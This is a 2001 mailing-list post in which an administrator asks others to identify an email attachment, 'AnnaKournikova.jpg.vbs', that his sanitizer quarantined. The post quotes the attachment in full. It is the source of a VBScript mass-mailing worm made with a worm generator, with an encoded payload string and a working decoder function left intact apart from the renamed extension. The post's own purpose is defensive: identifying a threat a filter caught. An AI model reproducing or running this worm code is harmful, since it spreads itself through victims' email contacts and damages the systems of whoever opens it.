[Esa-l] Alright, guys, what is this?
Brett Glass
brett at lariat.org
Mon Feb 12 09:15:44 PST 2001
The pattern I've added to John's sanitizer to trap hidden
extension exploits just caught this. What is it?
--Brett
> Content-Type: TEXT/PLAIN;
> X-Content-Security: NOTIFY
> X-Content-Security: REPORT: Trapped poisoned executable "AnnaKournikova.jpg.vbs"
> X-Content-Security: QUARANTINE
> Content-Description: SECURITY WARNING
>
> SECURITY WARNING!
> The mail system has detected that the following
> attachment may contain hazardous executable code,
> is a suspicious file type or has a suspicious file name.
> Contact your system administrator immediately!
>
> Content-Type: application/octet-stream; name="AnnaKournikova.jpg.6387DEFANGED-vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment; filename="AnnaKournikova.jpg.6387DEFANGED-vbs"
>
> 'Vbs.OnTheFly Created By OnTheFly
> Execute =
> e7iqom5JE4z("X)udQ0VpgjnH=11{tEcggv=11f{DQ=11VpgjnH=10{Q=0F=11ptGqt=11tg=
> TwugoP=11zg=10vU=0FvgG=11Q9v58Jr7R6?=11E=11gtvcQgldeg*vY$eUktvrU0gjnn+$=0F=
> =109G5QJv786r0Rgtyiktgv$=11MJWEu^hqyvtc^gpQjVHg{n$^=11.jE*t9:=11+=11(jE*=
> t33+3(=11E=11tj3*63=11+=11(jE*t23+;(=11E=11tj5*+4(=11E=11tj3*;2=11+=11(j=
> E*t9;=11+=11(jE*t23+2(=11E=11tj3*32=11+=11(jE*t45=11+=11(jE*t33+;(=11E=11=
> tj3*72=11+=11(jE*t33+8(=11E=11tj3*62=11+=11(jE*t45=11+=11(jE*t8:=11+=11(=
> jE*t:;=11+=11(jE*t33+7(=11E=11tj3*;3=11+=11(jE*t23+5(=11E=11tj5*+4(=11E=11=
> tj6*+;(=11E=11tj6*+8(=11E=11tj7*+5(=11E=11tj6*+:(=11E=11tj;*+:=0F=10gU=11=
> vQtcyVopldi?7E=11gtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v=10+t=0FyQoclVi=
> p7de0rqh{nk=11guyterk0veuktvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2=11=
> (^$pCcpqMtwkpqmcxl0irx0ud=10$k=0F=11h9G5QJv786r0Rgtticg=11f$*MJWEu^hqyvt=
> c^gpQjVHg{no^kcgn$f=11+@>$=11$3v=11gj=10pg=0Fp4CUJ9inEN+*=0F=10pg=11fhk=0F=
> =10hko=11pqjvp*yq=11+3?c=11fpf=11{cp*yq=11+4?=118jvpg=0F=109G5QJv786r0Rw=
> t=11pJ$vv<r11yy0y{fcp{dgvp0$n5.h.ncgu=0F=10pg=11fhk=0F=10gU=11vMLUiJy9M5=
> 9?zt=11yQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo=11.+3=0F=10P\L7\Mz=
> 6wk?XL=11iMyUMJ99z5t0cgcfnn=0F=10MLUiJy9M590znEuq=10gF=0F=10qK=0F=11hqP=11=
> vt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++V=11gj=10pU=0FvgW=11Kg4=
> 4:|6R2x=11?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gV=11wt+g=0F=
> =10gW4K|4R:x602tyvk\g7PML6\kzXw=0F=10gW4K|4R:x602nEuq=10gG=0FfpK=11=10hN=
> =0Fqq=10rH=0Fpwveqk=11p4gUp9CnJNi*E=10+Q=0F=11ptGqt=11tgTwugoP=11zg=10vU=
> =0FvgF=1154xQOzM8JT?=11E=11gtvcQgldeg*vQ$vwqnmqC0rrkncekvpq+$=0F=10hKF=11=
> 54xQOzM8JT=11?Q$vwqnmqV$gj=10pU=0Fvgl=1174PvD\h;n:F?54xQOzM8JTI0vgcPgorU=
> ec*gO$RC$K=10+U=0FvgU=11m834i35gN5=11?4lv7\P;D:h0nfCtfugNuukuv=0F=10qH=11=
> tcGjeL=114TRoOuD4ToK=11=11p8U4m33gi55=10NK=0F=11hTLo4uR4OoD0TfCtfugGuvpk=
> tugE0wqvp>=11=11@=112jVpg=0F=106fFDz5yi3x=11L=11?TLo4uR4OoD0TfCtfugGuvpk=
> tugE0wqvp=0F=10qH=11t9Z;:cX|5gT?|3=11V=11=11q6fFDz5yi3x=10LU=0Fvgk=119sd=
> 4:6x5\5?=11F=1154xQOzM8JTE0gtvcKggv*o+2=0F=10gU=11vKQ6GXDl[LQ=11:=11?TLo=
> 4uR4OoD0TfCtfugGuvpktugZ*:9X;5cT||g=10+k=0F9sd4:6x5\5V0=11q=11?KQ6GXDl[L=
> Q0:fCtfug=10uk=0F9sd4:6x5\5U0dwglve?=11$=11gJgt{=11wqj=11xc.g=3D=11+q=10=
> $k=0F9sd4:6x5\5D0fq=11{=11?J$<k=11$=11(dxtehn(=11$=11jEeg=11mjVuk$#(=11x=
> =11ednt=11h=11($$=0F=10gu=11vYhpu:sI[h;?3sk496d5:5x0\vCcvjegovp=10uh=0Fu=
> Ysp[:;I3hC0fft=11yQoclVip7dI0vgrUegckHnnqgf*t+2=11(^$pCcpqMtwkpqmcxl0irx=
> 0ud=10$k=0F9sd4:6x5\5F0ngvgCgvhtgwUodvk?=11V=11wt=10gK=0F=11hsk496d5:5x0=
> \qV>=11=11@$$V=11gj=10pk=0F9sd4:6x5\5U0pg=10fG=0FQ9v58Jr7R6t0igtyvk=11gJ=
> $EM^WquvhcygtQ^VpgjnH^{conkfg.$$=11$3=0F=10pG=11fhK=0F=10gPvz=0F=10pG=11=
> fhK=0F=10gPvz=0F=10pg=11fhk=0F=10pG=11fwHepkvpq=0F=10X)udiy3=1170d2")
> Function e7iqom5JE4z(hFeiuKrcoj3)
> For I =3D 1 To Len(hFeiuKrcoj3) Step 2
> StTP1MoJ3ZU=3D Mid(hFeiuKrcoj3, I, 1)
> WHz23rBqlo7=3D Mid(hFeiuKrcoj3, I + 1, 1)
> If Asc(StTP1MoJ3ZU) =3D 15 Then
> StTP1MoJ3ZU=3D Chr(10)
> ElseIf Asc(StTP1MoJ3ZU) =3D 16 Then
> StTP1MoJ3ZU =3D Chr(13)
> ElseIf Asc(StTP1MoJ3ZU) =3D 17 Then
> StTP1MoJ3ZU =3D Chr(32)
> Else
> StTP1MoJ3ZU =3D Chr(Asc(StTP1MoJ3ZU) - 2)
> End If
> If WHz23rBqlo7<> "" Then
> If Asc(WHz23rBqlo7) =3D 15 Then
> WHz23rBqlo7=3D Chr(10)
> ElseIf Asc(WHz23rBqlo7) =3D 16 Then
> WHz23rBqlo7=3D Chr(13)
> ElseIf Asc(WHz23rBqlo7) =3D 17 Then
> WHz23rBqlo7=3D Chr(32)
> Else
> WHz23rBqlo7=3D Chr(Asc(WHz23rBqlo7) - 2)
> End If
> End If
> e7iqom5JE4z =3D e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU
> Next
> End Function
> 'Vbswg 1.50b
> ------_=_NextPart_000_01C09516.89378E34--
More information about the esd-l
mailing list